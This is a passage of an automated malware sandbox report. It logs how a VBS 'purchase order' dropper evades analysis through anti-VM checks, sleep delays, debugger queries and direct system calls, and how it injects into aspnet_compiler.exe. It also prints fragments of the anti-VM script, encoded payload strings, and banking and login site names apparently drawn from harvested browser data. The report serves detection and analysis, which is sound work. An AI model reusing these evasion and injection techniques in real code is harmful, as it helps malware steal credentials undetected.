            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 58B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 69E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 1525Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 8447Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5632Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep count: 1525 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep time: -3050000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep count: 8447 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep time: -16894000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe TID: 3712Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: IsVirtualMachine = isVM
            Source: 47T9R4KG.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: wscript.exe, 00000000.00000003.2026393125.000001B7B2B85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026368215.000001B7B2B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026269673.000001B7B2B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /!!bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aX0PizREz6Xt@O9kdaZ66tX3!!YucaZL4ob&&MSXgOe7zdH6a&&2T7Kh7h&&xPEFnDveIpYgbw&&NxH0cQDwq5a1LxbgFRvqIhLatqqjgNUE/+buy@vi!!1DcOpuNBaSQ4gHnjThiF1Hv+5X&&FrpDrDP4
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: global block list test formVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
            Source: wscript.exe, 00000000.00000003.2036564223.000001B7B579D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037401880.000001B7B57D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2036436092.000001B7B579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035792745.000001B7B575B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037108856.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034316194.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030465925.000001B7B575B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035966452.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2027250785.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2036079326.000001B7B578D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039257084.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps
            Source: 47T9R4KG.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: JogKDBeJAc.exe, 00000007.00000002.3303933658.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: wscript.exe, 00000000.00000003.2044030653.000001B7B599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2042623223.000001B7B599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043298653.000001B7B599E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ec1ilguHnBurW/Vbts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFpsVhHx/aX0PizREz6Xt
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: wscript.exe, 00000000.00000003.2016235519.000001B7B2B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016344145.000001B7B2B51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016022728.000001B7B2B39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016208340.000001B7B2B4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!BwD@povoq?joR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZ!!O2R@zrlyhN3QahzLxrC!!?e2z!!yFbFZOL5fT+e?uPl25hGfSp&&Z
            Source: 47T9R4KG.6.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: wscript.exe, 00000000.00000003.2048683705.000001B7B57AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050801516.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046961495.000001B7B5773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048850003.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047406300.000001B7B5791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051389311.000001B7B57BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046591650.000001B7B5726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050421312.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049154272.000001B7B57A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051558296.000001B7B57C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051733995.000001B7B57C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/VXVlcXVBwDApovoqWjoR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZVO2RAzrlyhN3QahzLxrCVWe2zVyFbFZOL5fT+eWuPl25hGfSp
            Source: wscript.exe, 00000000.00000003.2012610434.000001B7B4A01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineYOcw4bl58Q
            Source: wscript.exe, 00000000.00000003.2020449015.000001B7B5875000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021020722.000001B7B5983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aX0PizREz6Xt@O9kdaZ66tX3!!YucaZL4ob&&MSXgOe7zdH6a&&2T7Kh7h&&xPEFnDveIpYgbw&&NxH0cQDwq5a1LxbgFRvqIhLatqqjgNUE/+buy@vi!!1DcOpuNBaSQ4gHnjThiF1Hv+5X&&FrpDrDP4
            Source: 47T9R4KG.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: InStr(objItem.Manufacturer, "QEMU") > 0 Then
            Source: PO1341489LTB GROUP.vbsBinary or memory string: If InStr(objItem.Manufacturer, "VMware") > 0 Or _
            Source: wscript.exe, 00000000.00000003.2012610434.000001B7B4A01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUdtkBQ0cw3yQ??fti3e@vQN+l3OxBIFk@fFflaP@?mc4/P+ZrxD0tC9cohjBm3z+IO/hgPGI7Ct0211zg1f?0R81wUP7?r0uRlHzQfOhQC6k/4SawIw*E@OvpKZea8?lR!!DNvegjlz6Lxu*3gN10t8&&S@@IPglt+I+acRrykLS1eUF9oGqK8blnfTejFDz!!KS9pSFzrgcE1C@BOgPxY3cR&&6jbrB8mT89bTQzI934i1u2O+YtRcGzFzGCiYga?PLL+kR9R6gSdjG!!zoxDvMPLjy60aKcaq28oriRUw5xhpQ?ip?cCTR6ksP3HvU0x+HNxQgGEooyPTN3lRlIN+k8sj5CpB@rdEoPCL*8iu5s5l3?GTsb?fsu/tm&&hH5&&CiEQ659zuNy3xCuZwtZhLK?IiT*&&jdw4vls4chbg5rGOwi3MxHSxmDP2YvSFmn6PIgRrQCSM0fHajD272IPkkq871OdMPh4@M9LmtPyjk7dwT?a!!gFwKareyMzkK61w2p6D*uzMD?G1uvbii84l*FSQ3zM/Eo?w62aziCddschGsrjqH4945Q2U4SkyEzP
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: wscript.exe, 00000000.00000003.2023069690.000001B7B5710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023184426.000001B7B5727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023721491.000001B7B5740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021805033.000001B7B5631000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023949787.000001B7B574A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023751121.000001B7B5749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: puPl25hGfSp&&XPN1fn&&c2E5TTq9+eO+6bYwMDj2HMgCLQZkgtSC6P1v
            Source: wscript.exe, 00000000.00000003.2055140201.000001B7B4A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareI1xDM1i
            Source: wscript.exe, 00000000.00000003.2013627427.000001B7B5804000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013406419.000001B7B57F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013880983.000001B7B5807000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012809336.000001B7B57B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013122046.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015395176.000001B7B5816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!BwD@povoq?joR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZ!!O2R@zrlyhN3QahzLxrC!!?e2z!!yFbFZOL5fT+e?uPl25hGfSp&&q
            Source: 47T9R4KG.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 47T9R4KG.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2055140201.000001B7B4A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUdtkBQ0cw3yQ??fti3e@vQN+l3OxBIFk@fFflaP@?mc4/P+ZrxD0tC9cohjBm3z+IO/hgPGI7Ct0211zg1f?0R81wUP7?r0uRlHzQfOhQC6k/4SawIw*E@OvpKZea8?lR!!DNvegjlz6Lxu*3gN10t8&&S@@IPglt+I+acRrykLS1eUF9oGqK8blnfTejFDz!!KS9pSFzrgcE1C@BOgPxY3cR&&6jbrB8mT89bTQzI934i1u2O+YtRcGzFzGCiYga?PLL+kR9R6gSdjG!!zoxDvMPLjy60aKcaq28oriRUw5xhpQ?ip?cCTR6ksP3HvU0x+HNxQgGEooyPTN3lRlIN+k8sj5CpB@rdEoPCL*8iu5s5l3?GTsb?fsu/tm&&hH5&&CiEQ659zuNy3xCuZwtZhLK?IiT*&&jdw4vls4chbg5rGOwi3MxHSxmDP2YvSFmn6PIgRrQCSM0fHajD272IPkkq871OdMPh4@M9LmtPyjk7dwT?a!!gFwKareyMzkK61w2p6D*uzMD?G1uvbii84l*FSQ3zM/Eo?w62aziCddschGsrjqH4945Q2U4SkyEzP!
            Source: wscript.exe, 00000000.00000003.2078472389.000001B7B2BEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
            Source: 47T9R4KG.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: wscript.exe, 00000000.00000003.2052827588.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048683705.000001B7B57AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050801516.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046961495.000001B7B5773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048850003.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047406300.000001B7B5791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046591650.000001B7B5726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050421312.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051558296.000001B7B57D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051073170.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd"l
            Source: 47T9R4KG.6.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 47T9R4KG.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbs | Binary or memory string: Function IsVirtualMachine()
            Source: 47T9R4KG.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 47T9R4KG.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 47T9R4KG.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 47T9R4KG.6.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 47T9R4KG.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 47T9R4KG.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 47T9R4KG.6.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 47T9R4KG.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 47T9R4KG.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 47T9R4KG.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbs | Binary or memory string: If IsVirtualMachine() Then
            Source: 47T9R4KG.6.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 47T9R4KG.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 47T9R4KG.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: firefox.exe, 00000009.00000002.2627684781.0000012BD580C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe | File created: x.exe.0.dr
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
